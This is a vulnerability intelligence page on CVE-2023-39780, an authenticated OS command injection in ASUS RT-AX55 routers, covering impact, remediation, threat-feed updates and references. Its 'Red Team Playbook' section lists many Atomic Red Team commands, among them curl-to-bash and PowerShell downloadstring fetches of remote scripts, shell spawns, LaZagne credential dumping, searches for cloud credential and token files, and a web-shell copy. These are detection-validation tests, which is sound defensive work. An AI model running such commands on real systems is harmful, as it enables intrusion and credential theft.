CVE-2023-39780
Overview
This vulnerability is an OS command injection affecting the ASUS RT-AX55 firmware version 3.0.0.4.386.51598. The root cause lies in insufficient input validation on the qos_bw_rulelist parameter within the /start_apply.htm endpoint. The affected component is the web management interface responsible for quality of service (QoS) bandwidth rule configuration, which fails to properly sanitize user-supplied input before passing it to system-level command execution.
Vulnerability Description
On ASUS RT-AX55 3.0.0.4.386.51598 devices, authenticated attackers can perform OS command injection via the /start_apply.htm qos_bw_rulelist parameter. NOTE: for the similar "token-generated module" issue, see CVE-2023-41345; for the similar "token-refresh module" issue, see CVE-2023-41346; for the similar "check token module" issue, see CVE-2023-41347; and for the similar "code-authentication module" issue, see CVE-2023-41348.
Impact
An attacker with authenticated access to the device's web interface can execute arbitrary operating system commands, potentially leading to full device compromise. This includes the ability to alter device configuration, disrupt network traffic, or pivot within the internal network. The prerequisite is possession of valid credentials with sufficient privileges to access the management interface. Successful exploitation can result in unauthorized control over the router, data interception, or denial of service impacting network availability.
Solution
Users should upgrade the ASUS RT-AX55 firmware to a version later than 3.0.0.4.386.51598 as provided by ASUS in their official security advisory. Detailed patch instructions and updated firmware images are available through ASUS support channels and referenced advisories linked in the vendor's security bulletin. No specific workarounds are documented; applying the latest firmware update is the recommended mitigation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in ASUS RT-AX55 devices stems from an OS command injection flaw that can be exploited through the qos_bw_rulelist parameter in the /start_apply.htm interface. This issue arises due to inadequate input validation, allowing authenticated attackers to manipulate system commands executed by the device. By crafting malicious input, an attacker can execute arbitrary commands on the underlying operating system, potentially leading to unauthorized access or control over the device. The severity of this vulnerability is underscored by its high CVSS score of 8.8, indicating a significant risk to affected systems.
Attack vectors for this vulnerability primarily involve authenticated users who have access to the device's web interface. Once an attacker gains legitimate credentials, they can exploit the command injection flaw by sending specially crafted requests to the vulnerable parameter. This could be achieved through various means, such as phishing attacks to obtain user credentials or exploiting weak passwords. Once inside, the attacker could execute commands that may allow them to alter device configurations, extract sensitive data, or even pivot to other devices within the network. The potential for lateral movement within a network makes this vulnerability particularly concerning, as it could lead to broader attacks against other connected systems.
The real-world impact of this vulnerability can be substantial, especially for organizations that rely on ASUS RT-AX55 devices for their networking infrastructure. Successful exploitation could result in unauthorized access to sensitive information, disruption of network services, and potential data breaches. Businesses may face significant financial losses due to operational downtime, reputational damage, and regulatory penalties if sensitive data is compromised. Moreover, the interconnected nature of modern networks means that a breach in one device can have cascading effects, impacting multiple systems and leading to a more extensive compromise.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating firmware to the latest versions is crucial, as vendors often release patches to address known vulnerabilities. Network monitoring tools can be employed to detect unusual traffic patterns or unauthorized access attempts, providing early warning signs of potential exploitation. Additionally, organizations should enforce strong authentication mechanisms, such as multi-factor authentication, to reduce the risk of unauthorized access. Conducting regular security audits and penetration testing can also help identify and remediate vulnerabilities before they can be exploited by malicious actors.
In conclusion, the OS command injection vulnerability in ASUS RT-AX55 devices presents a serious threat to both individual users and organizations. The ability for authenticated attackers to execute arbitrary commands can lead to significant security breaches and operational disruptions. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare themselves to defend against such vulnerabilities. Implementing robust detection and mitigation strategies will be essential in safeguarding network infrastructure and maintaining the integrity of sensitive data.
CSURFACE threat intelligence has identified a moderate increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2023-39780, rising by over 10% to nearly 0.47. This upward trend, while not classified as rapid, indicates growing confidence in the likelihood of exploitation attempts against ASUS RT-AX55 devices. Although no new exploit techniques or ransomware affiliations have been detected by our sensors, the inclusion of this vulnerability in the Known Exploited Vulnerabilities (KEV) catalog underscores its elevated priority for defenders. The heightened EPSS score suggests that threat actors may be increasingly targeting this OS command injection flaw, potentially leveraging authenticated access to execute malicious commands. Consequently, the risk level for organizations using affected devices should be considered elevated, warranting closer monitoring and prioritization within vulnerability management programs.
Update 2 — July 17, 2026
CSURFACE threat intelligence has identified a notable surge in detection activity related to CVE-2023-39780, reflecting an increased adversary focus on this authenticated OS command injection vulnerability in ASUS RT-AX55 devices. This uptick corresponds with a modest rise in the EPSS score, signaling a growing likelihood of exploitation attempts in operational environments. Although no new exploit techniques or ransomware affiliations have been observed, the vulnerability’s recent inclusion in the Known Exploited Vulnerabilities catalog further elevates its priority for defensive measures. The trend suggests that threat actors may be intensifying reconnaissance and preparatory actions, potentially increasing the risk of successful exploitation where authenticated access is obtained. Consequently, the threat level for affected organizations should be considered heightened, warranting enhanced vigilance in monitoring and response activities.
Update 3 — August 05, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2023-39780, indicating increased adversary interest or reconnaissance efforts targeting ASUS RT-AX55 devices. This uptick in telemetry corresponds with a slight rise in the EPSS score, reflecting a growing likelihood of exploitation attempts in the near term. Although no new exploit techniques or ransomware affiliations have been observed, the vulnerability’s recent addition to the Known Exploited Vulnerabilities catalog underscores its elevated priority within the threat landscape. For defenders, this trend signals a heightened risk environment where authenticated attackers may be more actively probing or preparing to leverage the OS command injection vector. Consequently, the threat level should be considered elevated, warranting increased monitoring and readiness to detect potential exploitation attempts.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Asus | Rt-Ax55 Firmware | 3.0.0.4.386.51598 |
cpe:2.3:o:asus:rt-ax55_firmware:3.0.0.4.386.51598:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
11 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
47%
|
High | High | |
| CAPEC-6 | Argument Injection |
46%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
40%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (9)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-39780 |
| github.com |
GitHub CVE
|
https://github.com/D2y6p/CVE/blob/main/asus/CVE-2023-39780/1/EN.md |
| github.com |
GitHub CVE
|
https://github.com/D2y6p/CVE/blob/main/asus/CVE-2023-39780/2/EN.md |
| github.com |
GitHub CVE
|
https://github.com/D2y6p/CVE/blob/main/asus/CVE-2023-39780/3/EN.md |
| github.com |
GitHub CVE
|
https://github.com/D2y6p/CVE/blob/main/asus/CVE-2023-39780/4/EN.md |
| github.com |
GitHub CVE
|
https://github.com/D2y6p/CVE/blob/main/asus/CVE-2023-39780/5/EN.md |
| github.com |
GitHub CVE
|
https://github.com/D2y6p/CVE/blob/main/asus/CVE-2023-39780/6/EN.md |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-39780 |
| greynoise.io |
NVD API
Exploit
Third Party Advisory
|
https://www.greynoise.io/blog/stealthy-backdoor-campaign-affecting-asus-routers |